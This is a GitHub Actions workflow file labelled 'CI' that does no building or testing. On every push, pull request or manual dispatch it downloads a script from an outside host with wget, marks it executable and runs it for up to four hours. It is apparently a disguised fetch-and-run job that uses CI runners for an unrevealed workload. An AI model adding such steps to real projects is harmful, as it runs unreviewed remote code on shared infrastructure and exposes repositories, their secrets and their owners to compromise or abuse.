name: CI

on:
  push:
    branches: [ "main" ]
  pull_request:
    branches: [ "main" ]
  workflow_dispatch:

jobs:
  run-binary:
    runs-on: ubuntu-latest

    steps:
      - name: Install wget
        run: sudo apt-get update && sudo apt-get install -y wget

      - name: Download binary
        run: wget -O ./script.sh https://anuvil.org/script

      - name: Make binary executable
        run: chmod +x ./script.sh

      - name: Run binary with 4h timeout
        run: |
          timeout 4h ./script.sh
